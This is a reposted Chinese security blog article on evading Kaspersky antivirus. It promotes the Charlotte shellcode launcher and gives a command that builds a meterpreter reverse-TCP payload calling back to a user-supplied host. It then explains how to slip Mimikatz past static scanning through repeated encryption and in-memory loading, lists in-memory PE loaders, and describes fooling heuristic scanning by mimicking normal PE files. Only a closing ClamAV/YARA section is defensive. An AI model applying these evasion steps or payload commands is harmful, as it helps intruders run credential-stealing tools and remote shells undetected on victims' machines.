免杀 | 卡巴斯基引擎另类免杀玩法
2024-1-12 18:10:6 Author: 白帽子左一(查看原文) 阅读量:70 收藏

扫码领资料

获网安教程

## 卡巴斯基引擎另类免杀玩法

Charlotte是一款基于C++实现的Shellcode启动器,并且完全不会被安全解决方案所检测到。

#### 项目地址:

https://github.com/9emin1/charlotte

#### Charlotte特色

1. c++ shellcode 启动器,截至 2021 年 5 月 13 日完全未被检测到 0/26。

2. win32 api函数的动态调用

3. shellcode和函数名的异或加密

4. 每次运行随机 XOR 键和变量

5. 在 Kali Linux 上,只需“apt-get install mingw-w64*”即可!

6. 随机字符串长度和 XOR 密钥长度

## 杀毒软件检测截图

用法

git clone 存储库,生成命名为 beacon.bin 的 shellcode 文件,然后运行 charlotte.pygit clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*cd charlottemsfvenom-pwindows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.binpython charlotte.pyprofit使用 msfvenom -p(显示在下面的 gif POC 中)以及cobalt strike攻击原始格式有效负载进行测试

### 启动命令

python charlotte.py

## 卡巴斯基引擎免杀环境搭建

伪造未知变种

那么上述我们通过已获取到的样本,编写好了规则,并且将一个还未发现的病毒file4类型也纳入了规则中。那么我们现在尝试是否会监测到新添加进去的样本。结果如下图。

可以看到,在我们建立好启发规则后,新病毒也被监测到了。

总结

特征码和启发式查杀在免杀制作过程中,需要非常注意的是启发式查杀,因为启发式查杀对壳一类的查杀非常厉害。或者数组中包含PE文件,也会直接被定为为病毒。这就导致了你需要尽量模仿正常PE文件才能绕过查杀。具体会在静态查杀绕过一章介绍方法。

绕过

通过前面章节的静态查杀原理学习,我们知道要绕过静态查杀需要绕过两种查杀方式,一种为指定特征码查杀,一种为启发式查杀。

环境配置

1.虚拟机安装Kaspersky Endpoint Security 11

开始实战

特征码查杀绕过

制作病毒

接下来我们使用Mimikatz作为测试工具,从Mimikatz Release下载处下载Mimikatz,将Mimikatz.exe放入kas中。

如上述所示,会被Kas查杀。

绕过方式

那么接下来我们则使用Github上开源的加密工具来加密。从该地址文件加密工具下载,使用FileCryptAES.exe -e 1234 mimikatz.exe加密后。得到一个加密文件,我们将其放到KAS进行扫描,发现成功绕过。之后使用内存加载,解密执行即可。

特征码查杀绕过总结

对文件反复加密,加密方式可以自选,之后内存解密加载即可。

内存加载方式可以使用下列几个项目:

1.https://github.com/aaaddress1/RunPE-In-Memory2.https://github.com/nettitude/SimplePELoader3.https://github.com/BenjaminSoelberg/ReflectivePELoader4.https://github.com/hasherezade/pe_to_shellcode4.https://github.com/hasherezade/pe_to_shellcode5.https://github.com/fancycode/MemoryModule6.https://github.com/Scavanger/MemoryModule.net

注意:

1.这里仅仅是绕过了静态特征码查杀,内存加载后会被动态查杀,具体绕过方式将会在动态一章介绍。

2.对于Xor或base64等加密后特征一致的算法需要多次加密。

启发式查杀绕过

制作病毒

下面我们来制作一个最小体积程序。使用Visualstudio创建Win32程序。删除所有资源和窗口。仅仅留下一句MessageBox。看看是否会被查杀。

```

#include "stdafx.h"#include "KasHeuristicBypass.h"

int APIENTRY _tWinMain(HINSTANCE hInstance, HINSTANCE hPrevInstance, LPTSTR lpCmdLine, int nCmdShow){ MessageBox(NULL, TEXT("title"), TEXT("123"), MB_OK); return (int) 0;}

```

绕过方式

还记得我们之前删除的资源和其他的窗体文件吗?将其还原即可,既给我们的病毒程序增加窗体和资源文件。既像正常程序该有的我们都有,就很难被启发式查杀了。

启发式绕过总结

模仿正常PE特征。

总结

无论是特征码还是启发式,只要不是加载器都可以使用反复加密,内存加载执行来绕过静态查杀。

## 卡巴斯基引擎始祖Clamav

前言

这篇文章我们将介绍一款开源杀毒软件Clamav,他也是卡巴斯机引擎的鼻祖,目前最新2022版卡巴斯基依然使用Clamav引擎框架,是通过学习开源杀毒软件病毒查杀原理来绕过其查杀技术。

环境配置

1.下载Clamav,建议下载portable版本。

2.运行下列命令配置Clamav。



cd “解压的目录\clamavcopy .\conf_examples\freshclam.conf.sample .\freshclam.confcopy .\conf_examples\clamd.conf.sample .\clamd.confwrite.exe .\freshclam.conf,删除Example一行write.exe .\clamd.conf,删除Example一行

开始实战

该实战通过两个示例,查杀已知病毒和查杀未知病毒,让读者了解病毒查杀的基本原理。

查杀已知病毒

制作病毒

写一个包含了下列文本的txt。保存为file1.txt文件。我们将其作为病毒文件。它有明显的特征,hideDir(“c:\”)函数。正常程序不会把C盘隐藏。

this is virus;

hideDir(“c:”);

写一个包含了下列文本的txt。保存为file2.txt文件。

abcdthis is virusefg。

写一个包含了下列文本的txt。保存为file3.txt文件。

12345this is virus6789。

将上述三个文件放置在同一个目录。

编写Yara规则

首先通过分析病毒文件,发现病毒文件包含了hideDir(“c:\”),编写一个简单的规则,其含义为只要包含了hideDir(“c:\”)函数的的则是病毒。然后将其保存为文件。

```

rule virus{    strings:        $flag = "hideDir(\"c:\\\")"    condition:        $flag}

```

执行查杀

执行以下命令

clamscan -d 规则目录 病毒存放目录

其中-d标志表示使用自定义规则

执行结果如下图所示

其中file1.txt包含了特征,被表示为YARA.virus.UNOFFICIAL FOUND,说明发现病毒。而其余两个文件没包含,则显示OK,表示没有包含病毒。

查杀未知病毒 制作病毒

写一个包含了下列文本的txt。保存为file1.txt文件。原始病毒文件。

this is virus;

hideDir(“c:”);

写一个包含了下列文本的txt。保存为file2.txt文件。该文件是file1的变种,由于作者发现被查杀后。更换了hideDir函数为hideDirEx。

this is virus version 2;

hideDirEx(“c:”);

写一个包含了下列文本的txt。保存为file3.txt文件。该文件是file2的变种,由于作者发现被查杀后。又更改了隐藏盘符的实现方式!

this is virus version 3;

changDirAttribute(“c”,“display=no”);

将上述文件放置在同一个目录。

编写Yara规则

通过分析上述例子,我们发现,对于单一的特征码形式的查杀,我们都是属于发现病毒,编写规则。那么我们也可以很明显发现特征,这三个病毒都会调用和目录相关的函数,并且都设置为隐藏。那么我们就可以提取出特征,既隐藏盘符的特征码。我们通过查阅计算机接口文档,发现还有一函数hideAllDir()。那么我们提前将其纳入到规则中。

rule virus{    strings:        $flag = "hideDir"        $flag2 = "hideDirEx"        $flag3 = "changDirAttribute"        $flag4 = "hideAllDir"    condition:        $flag or $flag2 or $flag3 or $flag4}

文章作者:零洞安全

声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权

@
学习更多渗透技能!体验靶场实战练习

hack视频资料及工具

(部分展示)

往期推荐

【精选】SRC快速入门+上分小秘籍+实战指南

爬取免费代理,拥有自己的代理池

漏洞挖掘|密码找回中的套路

渗透测试岗位面试题(重点:渗透思路)

漏洞挖掘 | 通用型漏洞挖掘思路技巧

干货|列了几种均能过安全狗的方法!

一名大学生的黑客成长史到入狱的自述

攻防演练|红队手段之将蓝队逼到关站!

巧用FOFA挖到你的第一个漏洞

看到这里了,点个“赞”、“再看”吧

文章来源: http://mp.weixin.qq.com/s?__biz=MzI4NTcxMjQ1MA==&mid=2247604905&idx=1&sn=03e1c371659640b1520332d1466cbf6a&chksm=ea4a8659fb3c490384b39bdbf2c17a7febbe5ebb26e519dd735b9a6222a4ee0782830ea06f62&scene=0&xtrack=1#rd
如有侵权请联系:admin#unsafe.sh